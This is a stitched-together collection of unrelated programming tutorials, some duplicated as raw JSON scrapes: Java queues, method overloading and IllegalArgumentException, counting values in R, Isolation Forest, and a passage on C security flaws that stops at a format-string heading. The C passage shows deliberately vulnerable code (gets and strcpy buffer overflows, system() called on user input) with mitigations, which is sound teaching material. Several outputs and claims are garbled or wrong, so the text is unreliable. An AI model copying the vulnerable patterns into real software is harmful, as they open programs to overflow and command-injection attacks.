3 4 5\n // ----------------------\n // queue : 16 5 9 1 12 15\n\n //As queue is full, elements will not be inserted.\n queue.insert(17);\n queue.insert(18);\n \n // ----------------------\n // index : 0 1 2 3 4 5\n // ----------------------\n // queue : 16 5 9 1 12 15\n System.out.println(\"Element at front: \"+queue.peek());\n\n System.out.println(\"----------------------\");\n System.out.println(\"index : 5 4 3 2 1 0\");\n System.out.println(\"----------------------\");\n System.out.print(\"Queue: \");\n while(!queue.isEmpty()){\n int n = queue.remove(); \n System.out.print(n +\" \");\n }\n }\n}" }, { "code": null, "e": 6728, "s": 6647, "text": "If we compile and run the above program then it would produce following result −" }, { "code": null, "e": 6874, "s": 6728, "text": "Queue is full!\nElement removed: 3\nElement at front: 5\n----------------------\nindex : 5 4 3 2 1 0\n----------------------\nQueue: 5 9 1 12 15 16\n" }, { "code": null, "e": 6881, "s": 6874, "text": " Print" }, { "code": null, "e": 6892, "s": 6881, "text": " Add Notes" } ]
Can we overload a method based on different return type but same argument type and number, in java?
When a class has two or more methods with the same name but different parameters, the respective method is invoked at the time of calling based on the parameters passed (i.e. the matching method body is bound to the call). This mechanism is known as method overloading. class Test{ public int division(int a, int b){ int result = a/b; return result; } public double division (float a, float b){ double result = a/b; return result; } } No, you cannot overload a method based on a different return type but the same argument type and number in Java. In overloading, it is a must that both methods have − the same name. different parameters (different type or, different number, or both). The return type doesn’t matter. If they don’t have different parameters, they are still considered the same method and a compile-time error will be generated. In the following example we are trying to overload two methods: they have the same name (division) and the same parameters (two integers). class Test{ public int division(int a, int b){ int result = a/b; return result; } public double division (int a, int b){ double result = a/b; return result; } } If you try to compile the above program, since the parameters are not different, the Java compiler considers them to be the same method and generates the following error. OverloadingExample.java:6: error: method division(int,int) is already defined in class Test public static double division (int a, int b){ ^ 1 error
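To make such an example compile, it is the parameter list that has to change, not just the return type. The class below is an illustrative sketch (not part of the original question) showing a legal pair of overloads and how the compiler picks between them:

class Calculator {
   // Legal overloads: the parameter types differ
   public int division(int a, int b) {
      return a / b;
   }
   public double division(double a, double b) {
      return a / b;
   }
}

public class OverloadResolutionDemo {
   public static void main(String[] args) {
      Calculator c = new Calculator();
      // The overload is chosen at compile time from the argument types
      System.out.println(c.division(7, 2));     // calls division(int, int)       -> 3
      System.out.println(c.division(7.0, 2.0)); // calls division(double, double) -> 3.5
   }
}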
[ { "code": null, "e": 1349, "s": 1062, "text": "When a class has two or more methods by the same name but different parameters, at the time of calling based on the parameters passed respective method is called (or respective method body will be bonded with the calling line dynamically). This mechanism is known as method overloading." }, { "code": null, "e": 1550, "s": 1349, "text": "class Test{\n public int division(int a, int b){\n int result = a/b;\n return result;\n }\n public double division (float a, float b){\n double result = a/b;\n return result;\n }\n}" }, { "code": null, "e": 1657, "s": 1550, "text": "No, you cannot overload a method based on different return type but same argument type and number in java." }, { "code": null, "e": 1712, "s": 1657, "text": "In overloading it is must that the both methods have −" }, { "code": null, "e": 1723, "s": 1712, "text": "same name." }, { "code": null, "e": 1791, "s": 1723, "text": "different parameters (different type or, different number or both)." }, { "code": null, "e": 1954, "s": 1791, "text": "The return type doesn’t matter. If they don’t have different parameters, they both are still considered as same method and a compile time error will be generated." }, { "code": null, "e": 2081, "s": 1954, "text": "In the following example we are trying to overload two methods: They have same name (division) same parameters (two integers)." }, { "code": null, "e": 2278, "s": 2081, "text": "class Test{\n public int division(int a, int b){\n int result = a/b;\n return result;\n }\n public double division (int a, int b){\n double result = a/b;\n return result;\n }\n}" }, { "code": null, "e": 2438, "s": 2278, "text": "If you try to compile the above program, since the parameters are not different Java compiler considers them as same methods and generates the following error." }, { "code": null, "e": 2607, "s": 2438, "text": "OverloadingExample.java:6: error: method division(int,int) is already defined in class Test\npublic static double division (int a, int b){\n ^\n1 error" } ]
How is an IllegalArgumentException automatically handled inside an 'if' condition in Java?
Whenever you pass inappropriate arguments to a method or constructor, an IllegalArgumentException is thrown. It is a runtime exception; therefore, there is no need to handle it at the time of compilation. The valueOf() method of the java.sql.Date class accepts a String representing a date in the JDBC escape format yyyy-[m]m-[d]d and converts it into a java.sql.Date object. import java.sql.Date; import java.util.Scanner; public class IllegalArgumentExample { public static void main(String args[]) { Scanner sc = new Scanner(System.in); System.out.println("Enter your date of birth in JDBC escape format (yyyy-mm-dd) "); String dateString = sc.next(); Date date = Date.valueOf(dateString); System.out.println("Given date converted into an object: "+date); } } Enter your date of birth in JDBC escape format (yyyy-mm-dd) 1989-09-26 Given date converted into an object: 1989-09-26 But if you pass the date String in any other format, this method throws an IllegalArgumentException. import java.sql.Date; import java.util.Scanner; public class IllegalArgumentExample { public static void main(String args[]) { Scanner sc = new Scanner(System.in); System.out.println("Enter your date of birth in JDBC escape format (yyyy-mm-dd) "); String dateString = sc.next(); Date date = Date.valueOf(dateString); System.out.println("Given date converted into an object: "+date); } } Enter your date of birth in JDBC escape format (yyyy-mm-dd) 26-07-1989 Exception in thread "main" java.lang.IllegalArgumentException at java.sql.Date.valueOf(Unknown Source) at july_ipoindi.NextElementExample.main(NextElementExample.java:11) The setPriority() method of the Thread class accepts an integer value representing the priority of the thread and sets it on the current thread. But the value passed to this method should not exceed the maximum priority of the thread; otherwise, this method throws an IllegalArgumentException. public class IllegalArgumentExample { public static void main(String args[]) { Thread thread = new Thread(); System.out.println(thread.MAX_PRIORITY); thread.setPriority(12); } } 10 Exception in thread "main" java.lang.IllegalArgumentException at java.lang.Thread.setPriority(Unknown Source) at july_ipoindi.NextElementExample.main(NextElementExample.java:6) While you use methods that cause an IllegalArgumentException, since you know their legal arguments, you can restrict/validate the arguments using an if condition beforehand and avoid the exception. import java.util.Scanner; public class IllegalArgumentExample { public static void main(String args[]) { Thread thread = new Thread(); System.out.println("Enter the thread priority value: "); Scanner sc = new Scanner(System.in); int priority = sc.nextInt(); if(priority<=Thread.MAX_PRIORITY) { thread.setPriority(priority); }else{ System.out.println("Priority value should be less than: "+Thread.MAX_PRIORITY); } } } Enter the thread priority value: 15 Priority value should be less than: 10
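Another option, shown here only as a brief illustrative sketch (it is not part of the answer above), is to let the call throw and handle the IllegalArgumentException explicitly with try-catch instead of guarding with an if condition:

import java.util.Scanner;
public class IllegalArgumentCatchExample {
   public static void main(String args[]) {
      Thread thread = new Thread();
      System.out.println("Enter the thread priority value: ");
      Scanner sc = new Scanner(System.in);
      int priority = sc.nextInt();
      try {
         // Throws IllegalArgumentException if the value is outside the allowed priority range
         thread.setPriority(priority);
         System.out.println("Priority set to: " + thread.getPriority());
      } catch (IllegalArgumentException e) {
         System.out.println("Invalid priority value: " + priority);
      }
   }
}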
[ { "code": null, "e": 1267, "s": 1062, "text": "Whenever you pass inappropriate arguments to a method or constructor, an IllegalArgumentException is thrown. It is a Runtime exception therefore there is no need to handle this at the time of compilation." }, { "code": null, "e": 1434, "s": 1267, "text": "The valueOf() method of the java.sql.Date class accepts a String representing a date in JDBC escape format yyyy-[m]m-[d]d and converts it into a java.sql.Date object." }, { "code": null, "e": 1859, "s": 1434, "text": "import java.sql.Date;\nimport java.util.Scanner;\npublic class IllegalArgumentExample {\n public static void main(String args[]) {\n Scanner sc = new Scanner(System.in);\n System.out.println(\"Enter your date of birth in JDBC escape format (yyyy-mm-dd) \");\n String dateString = sc.next();\n Date date = Date.valueOf(dateString);\n System.out.println(\"Given date converted int to an object: \"+date);\n }\n}" }, { "code": null, "e": 1978, "s": 1859, "text": "Enter your date of birth in JDBC escape format (yyyy-mm-dd)\n1989-09-26\nGiven date converted into an object: 1989-09-26" }, { "code": null, "e": 2074, "s": 1978, "text": "But if you pass date String in any other format this method throws an IllegalArgumentException." }, { "code": null, "e": 2499, "s": 2074, "text": "import java.sql.Date;\nimport java.util.Scanner;\npublic class IllegalArgumentExample {\n public static void main(String args[]) {\n Scanner sc = new Scanner(System.in);\n System.out.println(\"Enter your date of birth in JDBC escape format (yyyy-mm-dd) \");\n String dateString = sc.next();\n Date date = Date.valueOf(dateString);\n System.out.println(\"Given date converted int to an object: \"+date);\n }\n}" }, { "code": null, "e": 2828, "s": 2499, "text": "Enter your date of birth in JDBC escape format (yyyy-mm-dd)\n26-07-1989\nException in thread \"main\" java.lang.IllegalArgumentException\n at java.sql.Date.valueOf(Unknown Source)\n at july_ipoindi.NextElementExample.main(NextElementExample.java:11)\nIn the following Java example the Date constructor (actually deprecated) accepts" }, { "code": null, "e": 3114, "s": 2828, "text": "The setPriority() method of the Thread class accepts an integer value representing the priority of the thread and sets it to the current thread. But, the value passed to this method should be less than the maxpriority of the thread else, this method throws an IllegalArgumentException." }, { "code": null, "e": 3316, "s": 3114, "text": "public class IllegalArgumentExample {\n public static void main(String args[]) {\n Thread thread = new Thread();\n System.out.println(thread.MAX_PRIORITY);\n thread.setPriority(12);\n }\n}" }, { "code": null, "e": 3501, "s": 3316, "text": "10Exception in thread \"main\"\njava.lang.IllegalArgumentException\n at java.lang.Thread.setPriority(Unknown Source)\n at july_ipoindi.NextElementExample.main(NextElementExample.java:6)" }, { "code": null, "e": 3705, "s": 3501, "text": "While you use the methods that causes IllegalArgumentException, since you know the legal arguments of them, you can restrict/validate the arguments using if-condition before-hand and avoid the exception." 
}, { "code": null, "e": 4188, "s": 3705, "text": "import java.util.Scanner;\npublic class IllegalArgumentExample {\n public static void main(String args[]) {\n Thread thread = new Thread();\n System.out.println(\"Enter the thread priority value: \");\n Scanner sc = new Scanner(System.in);\n int priority = sc.nextInt();\n if(priority<=Thread.MAX_PRIORITY) {\n thread.setPriority(priority);\n }else{\n System.out.println(\"Priority value should be less than: \"+Thread.MAX_PRIORITY);\n }\n }\n}" }, { "code": null, "e": 4263, "s": 4188, "text": "Enter the thread priority value:\n15\nPriority value should be less than: 10" } ]
How to count the number of occurrences of all unique values in an R data frame?
A data frame in R can have infinite number of unique values and it can also contain many repeated values. Therefore, finding the number of all unique values in the data frame can help us to understand the diversity in the data but this most done in situations where we expect to have repeated elements otherwise it would not make sense. To count the number of occurrences of all unique values, we can use table function along with the unlist as shown in the below examples. Consider the below data frame − Live Demo x1<-sample(LETTERS[1:5],20,replace=TRUE) x2<-sample(LETTERS[1:5],20,replace=TRUE) x3<-sample(LETTERS[1:5],20,replace=TRUE) x4<-sample(LETTERS[1:5],20,replace=TRUE) x5<-sample(LETTERS[1:5],20,replace=TRUE) df1<-data.frame(x1,x2,x3,x4,x5) df1 x1 x2 x3 x4 x5 1 B E D E E 2 E A C E E 3 C A D A D 4 C C A D C 5 D D A C B 6 C C E E B 7 B B C B A 8 A E B C B 9 E D E B E 10 C B A C A 11 C C C B D 12 A B C A A 13 C D D C C 14 E C E D C 15 A A B D E 16 E D E A E 17 C C A D E 18 C C E C D 19 B B A E B 20 D B D A B Finding the number of unique values in the data frame df1 − table(unlist(df1)) A B C D E 18 27 22 17 16 Let’s have a look at another example − Live Demo y1<-sample(0:2,20,replace=TRUE) y2<-sample(0:2,20,replace=TRUE) y3<-sample(0:2,20,replace=TRUE) y4<-sample(0:2,20,replace=TRUE) df2<-data.frame(y1,y2,y3,y4) df2 y1 y2 y3 y4 1 0 2 1 2 2 0 0 1 1 3 1 1 2 1 4 2 2 0 0 5 1 0 2 1 6 0 2 2 0 7 0 0 1 1 8 0 2 0 1 9 2 2 2 2 10 1 0 2 0 11 0 1 1 2 12 2 2 2 1 13 0 1 1 0 14 2 2 1 2 15 2 2 0 0 16 2 2 1 1 17 1 2 2 2 18 2 1 0 2 19 1 0 2 0 20 1 2 0 2 Finding the number of unique values in the data frame df2 − table(unlist(df2)) 0 1 2 32 26 22
[ { "code": null, "e": 1536, "s": 1062, "text": "A data frame in R can have infinite number of unique values and it can also contain many repeated values. Therefore, finding the number of all unique values in the data frame can help us to understand the diversity in the data but this most done in situations where we expect to have repeated elements otherwise it would not make sense. To count the number of occurrences of all unique values, we can use table function along with the unlist as shown in the below examples." }, { "code": null, "e": 1568, "s": 1536, "text": "Consider the below data frame −" }, { "code": null, "e": 1579, "s": 1568, "text": " Live Demo" }, { "code": null, "e": 1820, "s": 1579, "text": "x1<-sample(LETTERS[1:5],20,replace=TRUE)\nx2<-sample(LETTERS[1:5],20,replace=TRUE)\nx3<-sample(LETTERS[1:5],20,replace=TRUE)\nx4<-sample(LETTERS[1:5],20,replace=TRUE)\nx5<-sample(LETTERS[1:5],20,replace=TRUE)\ndf1<-data.frame(x1,x2,x3,x4,x5)\ndf1" }, { "code": null, "e": 2177, "s": 1820, "text": " x1 x2 x3 x4 x5\n1 B E D E E\n2 E A C E E\n3 C A D A D\n4 C C A D C\n5 D D A C B\n6 C C E E B\n7 B B C B A\n8 A E B C B\n9 E D E B E\n10 C B A C A\n11 C C C B D\n12 A B C A A\n13 C D D C C\n14 E C E D C\n15 A A B D E\n16 E D E A E\n17 C C A D E\n18 C C E C D\n19 B B A E B\n20 D B D A B" }, { "code": null, "e": 2237, "s": 2177, "text": "Finding the number of unique values in the data frame df1 −" }, { "code": null, "e": 2256, "s": 2237, "text": "table(unlist(df1))" }, { "code": null, "e": 2287, "s": 2256, "text": "A B C D E \n18 27 22 17 16" }, { "code": null, "e": 2326, "s": 2287, "text": "Let’s have a look at another example −" }, { "code": null, "e": 2337, "s": 2326, "text": " Live Demo" }, { "code": null, "e": 2498, "s": 2337, "text": "y1<-sample(0:2,20,replace=TRUE)\ny2<-sample(0:2,20,replace=TRUE)\ny3<-sample(0:2,20,replace=TRUE)\ny4<-sample(0:2,20,replace=TRUE)\ndf2<-data.frame(y1,y2,y3,y4)\ndf2" }, { "code": null, "e": 2792, "s": 2498, "text": " y1 y2 y3 y4\n1 0 2 1 2\n2 0 0 1 1\n3 1 1 2 1\n4 2 2 0 0\n5 1 0 2 1\n6 0 2 2 0\n7 0 0 1 1\n8 0 2 0 1\n9 2 2 2 2\n10 1 0 2 0\n11 0 1 1 2\n12 2 2 2 1\n13 0 1 1 0\n14 2 2 1 2\n15 2 2 0 0\n16 2 2 1 1\n17 1 2 2 2\n18 2 1 0 2\n19 1 0 2 0\n20 1 2 0 2" }, { "code": null, "e": 2852, "s": 2792, "text": "Finding the number of unique values in the data frame df2 −" }, { "code": null, "e": 2871, "s": 2852, "text": "table(unlist(df2))" }, { "code": null, "e": 2889, "s": 2871, "text": " 0 1 2\n32 26 22" } ]
“Isolation Forest”: The Anomaly Detection Algorithm Any Data Scientist Should Know | by Samuele Mazzanti | Towards Data Science
“Isolation Forest” is a brilliant algorithm for anomaly detection born in 2009 (here is the original paper). It has since become very popular: it is also implemented in Scikit-learn (see the documentation). In this article, we will appreciate the beauty in the intuition behind this algorithm and understand how exactly it works under the hood, with the aid of some examples. Anomaly (or outlier) detection is the task of identifying data points that are “very strange” compared to the majority of observations. This is useful in a range of applications, from fault detection to discovery of financial frauds, from finding health issues to identifying unsatisfied customers. Moreover, it can also be beneficial for machine learning pipelines, since it has been proven that removing outliers leads to an increase in model accuracy. What makes anomaly detection so hard is that it is an unsupervised problem. In other words, we usually don’t have labels telling us which instances are actually “anomalies”. Or rather, even if we had labels, it would be very hard to frame anomaly detection as a supervised problem. In fact: anomalies are rare; anomalies are novel; anomalies are different from each other. For all these reasons, supervised techniques are typically a bad fit for anomaly detection. The traditional approach to anomaly detection was roughly: Describe what “normal instances” look like (this usually involves cluster analysis). Label all instances that don’t fit into those profiles as outliers. The innovation introduced by Isolation Forest is that it starts directly from outliers rather than from normal observations. The core idea is that it should be very easy to “isolate” anomalies based on the characteristics that make them unique. Technically, this translates into the fact that, if we fit a decision tree on all the observations, outliers should be found closer to the root of the tree than “normal” instances. What does it mean? Let’s make this clear with an example. Suppose that we have a dataset containing data about all the 7,932,843,214 humans alive right now. We have as many variables as we want: age, net worth, place of residence, job title... What are the outliers in such a dataset? Keep in mind that outliers are not necessarily wrong data: they are just data points that are very different from the rest of the population. In this example, Jeff Bezos is for sure an outlier. Now imagine that we could fit a decision tree such that each terminal leaf contains one and only one person. In other words, this tree is completely unpruned. If the assumption behind Isolation Forest is correct, then Jeff Bezos will be found closer to the tree root than, say, myself. Being an outlier, Jeff Bezos is easier to isolate: it’s enough to ask “is he worth more than 170 billion $?” to retrieve him among almost 8 billion humans. On the other hand, since I am by far more ordinary than Jeff Bezos, you would probably need at least 10 True/False questions to narrow down the search space until you find me. Now that we have seen the main intuition behind Isolation Forest, let’s try to understand the exact mechanics of the algorithm, with the aid of some simple data points.
import pandas as pd
df = pd.DataFrame({ 'x': [1.0, 1.1, 1.2, 1.3, 1.4, 1.5, 2.0], 'y': [2.1, 2.4, 3.0, 2.6, 2.2, 2.8, 3.7]}, index = ['A', 'B', 'C', 'D', 'E', 'F', 'G']) Items from A to F represent a quite compact cloud of points: they are “normal” data points. Compared to these instances, G is probably an outlier: it has anomalous values both for x and y. Isolation Forest is based on trees, so let’s fit a tree on these data: Note that this tree has been grown in a random fashion. The most fundamental concept here is the depth of the leaf at which each element is found. For example, in this tree, the observation called G (our outlier) is at depth 1 (i.e. 1 level from the root node), whereas C is at depth 3. The idea behind Isolation Forest is that, on average, outliers will be closer to the root node (i.e. at a lower depth) than normal instances. As often in machine learning, the key is iteration. In fact, if we randomly fit many decision trees, and then take an average of the depth of each observation over the different trees, we find an “average depth” that represents an empirical measure of “outlierness”. Let’s see an example of usage through Scikit-learn’s implementation. from sklearn.ensemble import IsolationForest
iforest = IsolationForest(n_estimators = 100).fit(df) If we take the first 9 trees from the forest (iforest.estimators_[:9]) and plot them, this is what we get: Taking a look at these first 9 trees, we can already see a pattern: G tends to be at a much lower depth (1.44 on average) than any other point. Indeed, the second point is A with an average depth of 2.78. Conceptually, this is exactly how the algorithm works: a lower average depth means a higher likelihood of being an outlier. However, in practice, we cannot use average depth, since the depth of a tree depends on the number of samples it has been fit on. For this reason, we need a formula that also takes into account the total number of instances. This is the formula proposed in the paper: s(x, n) = 2^(−E(h(x)) / c(n)), with c(n) = 2·H(n−1) − 2(n−1)/n, where n is the number of instances, h(x) is the depth at which the data point is found in a particular tree (E(h(x)) is its average over different trees), and H is the harmonic number. s(x, n) is a number between 0 and 1, where the higher the score the more likely it is an outlier. Note: Scikit-learn’s implementation returns the opposite of the score defined above. So what was said above is still valid, but with a negative sign. On our small dataset, the scores are given by: scores = iforest.score_samples(df) Let’s see the scores estimated for each of our points: As we expected, G is more likely to be an outlier, since its score is lower than all the other scores. Besides our toy dataset, it’s interesting to simulate what the algorithm would yield in some particular cases. For instance, if we take some data points that roughly form a circle shape on two variables (x and y), this is the contour plot of the scores that we would obtain through Isolation Forest: Interestingly enough, not only the most extreme zones are likely to be outliers, but also the part at the center of the circle, since it is an unusual combination of x and y. Thank you for reading! I hope you found this post useful. I appreciate feedback and constructive criticism. If you want to talk about this article or other related topics, you can text me at my Linkedin contact.
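As an appendix to the article above (a worked example added here, not part of the original), we can plug the toy dataset into the anomaly-score formula. With n = 7 points and the harmonic number H(6) = 2.45:

c(7) = 2·H(6) − 2·(7 − 1)/7 ≈ 4.90 − 1.71 ≈ 3.19
s(G, 7) = 2^(−1.44 / 3.19) ≈ 0.73
s(A, 7) = 2^(−2.78 / 3.19) ≈ 0.55

So the average depths of 1.44 and 2.78 reported above translate into scores of roughly 0.73 for G and 0.55 for A, consistent with G being the most outlier-like point (and, under Scikit-learn's sign convention, with G receiving the most negative score_samples value).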
[ { "code": null, "e": 378, "s": 171, "text": "“Isolation Forest” is a brilliant algorithm for anomaly detection born in 2009 (here is the original paper). It has since become very popular: it is also implemented in Scikit-learn (see the documentation)." }, { "code": null, "e": 547, "s": 378, "text": "In this article, we will appreciate the beauty in the intuition behind this algorithm and understand how exactly it works under the hood, with the aid of some examples." }, { "code": null, "e": 683, "s": 547, "text": "Anomaly (or outlier) detection is the task of identifying data points that are “very strange” compared to the majority of observations." }, { "code": null, "e": 1002, "s": 683, "text": "This is useful in a range of applications, from fault detection to discovery of financial frauds, from finding health issues to identifying unsatisfied customers. Moreover, it can also be beneficial for machine learning pipelines, since it has been proven that removing outliers leads to an increase in model accuracy." }, { "code": null, "e": 1293, "s": 1002, "text": "What makes anomaly detection so hard is that it is an unsupervised problem. In other words, we usually don’t have labels telling us which instances are actually “anomalies”. Or rather, even if we had labels, it would be very hard to frame anomaly detection as a supervised problem. In fact:" }, { "code": null, "e": 1313, "s": 1293, "text": "anomalies are rare;" }, { "code": null, "e": 1334, "s": 1313, "text": "anomalies are novel;" }, { "code": null, "e": 1375, "s": 1334, "text": "anomalies are different from each other." }, { "code": null, "e": 1469, "s": 1375, "text": "For all these reasons, supervised techniques typically make a bad fit with anomaly detection." }, { "code": null, "e": 1528, "s": 1469, "text": "The traditional approach to anomaly detection was roughly:" }, { "code": null, "e": 1679, "s": 1528, "text": "Describe how “normal instances” look like (this usually involves cluster analysis).Label all instances that don’t fit into those profiles as outliers." }, { "code": null, "e": 1763, "s": 1679, "text": "Describe how “normal instances” look like (this usually involves cluster analysis)." }, { "code": null, "e": 1831, "s": 1763, "text": "Label all instances that don’t fit into those profiles as outliers." }, { "code": null, "e": 1956, "s": 1831, "text": "The innovation introduced by Isolation Forest is that it starts directly from outliers rather than from normal observations." }, { "code": null, "e": 2075, "s": 1956, "text": "The core idea is that it should be very easy to “isolate” anomalies based on the caracteristics that make them unique." }, { "code": null, "e": 2256, "s": 2075, "text": "Technically, this translates into the fact that, if we fit a decision tree on all the observations, outliers should be found closer to the root of the tree than “normal” instances." }, { "code": null, "e": 2314, "s": 2256, "text": "What does it mean? Let’s make this clear with an example." }, { "code": null, "e": 2500, "s": 2314, "text": "Suppose that we have a dataset containing data about all the 7,932,843,214 humans alive right now. We have as many variables as we want: age, net worth, place of residence, job title..." }, { "code": null, "e": 2735, "s": 2500, "text": "What are the outliers in such a dataset? Keep in mind that outliers are not necessarily wrong data: they are just data points that are very different from the rest of the population. In this example, Jeff Bezos is for sure an outlier." 
}, { "code": null, "e": 3021, "s": 2735, "text": "Now imagine that we could fit a decision tree such that each terminal leaf contains one and only one person. In other words, this tree is completely unpruned. If the assumption behind Isolation Forest is correct, then Jeff Bezos will be found closer to the tree root than, say, myself." }, { "code": null, "e": 3352, "s": 3021, "text": "Being an outlier, Jeff Bezos is easier to isolate: it’s enough to ask “is he worth more than 170 billion $?” to retrieve him among almost 8 billion humans. On the other hand, since I am by far more ordinary than Jeff Bezos, you would probably need at least 10 True/False question to narrow down the search space until you find me." }, { "code": null, "e": 3521, "s": 3352, "text": "Now that we have seen the main intuition behind Isolation Forest, let’s try to understand the exact mechanics of the algorithm, with the aid of some simple data points." }, { "code": null, "e": 3696, "s": 3521, "text": "import pandas as pddf = pd.DataFrame({ 'x': [1.0, 1.1, 1.2, 1.3, 1.4, 1.5, 2.0], 'y': [2.1, 2.4, 3.0, 2.6, 2.2, 2.8, 3.7]}, index = ['A', 'B', 'C', 'D', 'E', 'F', 'G'])" }, { "code": null, "e": 3885, "s": 3696, "text": "Items from A to F represent a quite compact cloud of points: they are “normal” data points. Compared to these instances, G is probably an outlier: it has anomalous values both for x and y." }, { "code": null, "e": 3956, "s": 3885, "text": "Isolation Forest is based on trees, so let’s fit a tree on these data:" }, { "code": null, "e": 4012, "s": 3956, "text": "Note that this tree has been grown in a random fashion." }, { "code": null, "e": 4243, "s": 4012, "text": "The most fundamental concept here is the depth of the leaf at which each element is found. For example, in this tree, the observation called G (our outlier) is at depth 1 (e.g. 1 level from the root node), whereas C is at depth 3." }, { "code": null, "e": 4385, "s": 4243, "text": "The idea behind Isolation Forest is that, on average, outliers will be closer to the root node (i.e. at a lower depth) than normal instances." }, { "code": null, "e": 4652, "s": 4385, "text": "As often in machine learning, the key is iteration. In fact, if we randomly fit many decision trees, and then take an average of the depth of each observation over the different trees, we find an “average depth” that represents an empirical measure of “outlierness”." }, { "code": null, "e": 4725, "s": 4652, "text": "Let’s see an example of usage through the Scikit-learn’s implementation." }, { "code": null, "e": 4823, "s": 4725, "text": "from sklearn.ensemble import IsolationForestiforest = IsolationForest(n_estimators = 100).fit(df)" }, { "code": null, "e": 4930, "s": 4823, "text": "If we take the first 9 trees from the forest (iforest.estimators_[:9]) and plot them, this is what we get:" }, { "code": null, "e": 5135, "s": 4930, "text": "Taking a look at these first 9 trees, we can already see a pattern: G tends to be at a much lower depth (1.44 on average) than any other point. Indeed, the second point is A with an average depth of 2.78." }, { "code": null, "e": 5259, "s": 5135, "text": "Conceptually, this is exactly how the algorithm works: a lower average depth means a higher likelihood of being an outlier." }, { "code": null, "e": 5526, "s": 5259, "text": "However, in practice, we cannot use average depth, since the depth of a tree depends on the number of samples it has been fit on. 
For this reason, we need a formula that also take into account the total number of instances. This is the formula proposed in the paper:" }, { "code": null, "e": 5710, "s": 5526, "text": "where n is the number of instances, h(x) is the depth at which the data point is found in a particular tree (E(h(x)) is its average over different trees), and H is the armonic number." }, { "code": null, "e": 5808, "s": 5710, "text": "s(x, n) is a number between 0 and 1, where the higher the score the more likely it is an outlier." }, { "code": null, "e": 5952, "s": 5808, "text": "Note: Scikit-learn’s implementation returns the opposite of the score defined above. So what said above is still valid, but with negative sign." }, { "code": null, "e": 5999, "s": 5952, "text": "On our small dataset, the scores are given by:" }, { "code": null, "e": 6034, "s": 5999, "text": "scores = iforest.score_samples(df)" }, { "code": null, "e": 6089, "s": 6034, "text": "Let’s see the scores estimated for each of our points:" }, { "code": null, "e": 6192, "s": 6089, "text": "As we expected, G is more likely to be an outlier, since its score is lower than all the other scores." }, { "code": null, "e": 6492, "s": 6192, "text": "Besides our toy dataset, it’s interesting to simulate what the algorithm would yield in some particular cases. For instance, if we take some data points that roughly form a circle shape on two variables (x and y), this is the contour plot of the scores that we would obtain through Isolation Forest:" }, { "code": null, "e": 6668, "s": 6492, "text": "Interestingly enough, not only the most extremes zones are likely to be outliers, but also the part at the center of the circle, since it is an unusual combination of x and y." }, { "code": null, "e": 6726, "s": 6668, "text": "Thank you for reading! I hope you found this post useful." } ]
Security issues in C language - GeeksforGeeks
01 Dec, 2021 C is a very powerful and popular programming language. It was first developed in the 1970s. The C language is used in programming network drivers, interpreters, compilers, etc. Even though the C language is widely used in different systems, it still has many security flaws associated with it. This article focuses on discussing security vulnerabilities in the C language. Mainly, these security issues are related to vulnerable library functions, no bound checking for arrays, and pointers. Vulnerable Library Functions: CWE Codes: CWE-242, CWE-120, CWE-77 1. Buffer And Memory Related: a. gets(): This function is a part of the standard input-output library of the C language. It does not have any check for buffer size, and malicious input can easily cause a buffer overflow. Below is the C program to demonstrate the above concept- C // C program to implement// the above approach#include <stdio.h> // Driver codeint main(){ char buf[24]; printf("Please enter your name and press <Enter>\n"); gets(buf); printf("%s", buf); return 0;} Warning: prog.c: In function ‘main’: prog.c:10:1: warning: implicit declaration of function ‘gets’ [-Wimplicit-function-declaration] gets(buf); ^ /tmp/ccmwzcCQ.o: In function `main’: 69c380139e12adbab30e0550af51f5a9.c:(.text+0x2e): warning: the `gets’ function is dangerous and should not be used. Output: Input: GeeksforGeeks Output: Please enter your name and press GeeksforGeeks Explanation: In the above code, the attacker can give a large chunk of data as input, and the gets() function will try to store all that data into the buffer without considering the buffer size, which will eventually cause a buffer overflow situation that can further lead to arbitrary code execution or an information leak. Mitigation: To solve this issue with the gets() function, programmers can use the fgets() function. It limits the input length based on the buffer size. Below is the C program to implement the above approach- C // C program to implement// the above approach#include <stdio.h>#define MAX 15 // Driver codeint main(){ char buf[MAX]; fgets(buf, MAX, stdin); printf("%s", buf); return 0;} Output: Input: GeeksforGeeks Output: GeeksforGeeks Explanation: In the above code, the fgets() function takes the buffer size ‘MAX’ as an argument and will only write data that can be safely stored into the buffer of that size without overflowing it. b. strcpy(): This built-in function also doesn’t check for the buffer length and can overwrite memory locations based on the malicious input. If the buffer size of the dest string is larger than the src string, it copies the src string to the dest string with a terminating NULL character. But if the dest buffer is smaller than src, it will copy the content without a terminating NULL character. The strings may not overlap, and the destination string must be large enough to receive the copy. Below is the C program to demonstrate the above concept- C // C program to implement// the above approach#include <stdio.h>#include <string.h> // Driver codeint main(){ char str1[2]; char str2[] = "GeeksforGeeks"; strcpy(str1, str2); printf("Copied string is: %s\n", str1); return 0;} Output: Input: GeeksforGeeks Output: Copied string is: GeeksforGeeks Explanation: In the above code, the strcpy() function is trying to copy the string in str2[] to str1[], which does not have enough buffer space allocated to handle it, which will eventually result in a buffer overflow in the application. Mitigation: Use the strncpy() function instead of strcpy().
strncpy() limits the length of input based on the buffer size available. Below is the C program to demonstrate the above concept- C // C program to implement// the above approach#include <stdio.h>#include <string.h>#define BUFFER_SIZE 24 // Driver codeint main(){ // 24 is the buffer size char str1[BUFFER_SIZE]; char str2[] = "GeeksforGeeks"; // Limits number of characters // to be copied strncpy(str1, str2, BUFFER_SIZE); printf("Copied string is: %s\n", str1); return 0;} Output: Input: GeeksforGeeks Output: Copied string is: GeeksforGeeks Explanation: In the above code, the strncpy() function takes BUFFER_SIZE as an argument and will only write data that can be safely stored into str1[ ] without overflowing the buffer. Using the strcpy() function to copy a large character array into a smaller one is dangerous; even if the string happens to fit, it is generally not worth the risk. If the destination string is not large enough to store the source string, then the behavior of strcpy() is unspecified or undefined. Note: Other library functions with the same type of vulnerability - calloc, malloc, realloc, strcat, memcpy. 2. Command Execution Vulnerabilities: If the attacker can control the command text or the arguments to an external function call, then they can run arbitrary code very easily. Below is the C program to demonstrate the above concept- C // C program to implement// the above approach#include <stdio.h>#include <stdlib.h>#include <unistd.h> // Driver codeint main(){ char str[40]; fgets(str, 39, stdin); system(str); printf("%s", str);} Runtime Errors: sh: 1: GeeksforGeeks: not found Output: Input: GeeksforGeeks Output: GeeksforGeeks Explanation: In the above code, if str is controlled by the attacker, then they can execute any command on the system and can put the entire system at risk. Observed CVEs are CVE-1999-0067, CVE-2019-12921. Mitigation: Ensure that all external commands called from the program are statically created. Use library calls rather than external processes to recreate the desired functionality. Note: Other library functions with the same type of vulnerability: execl, execle, popen. 3. Format String 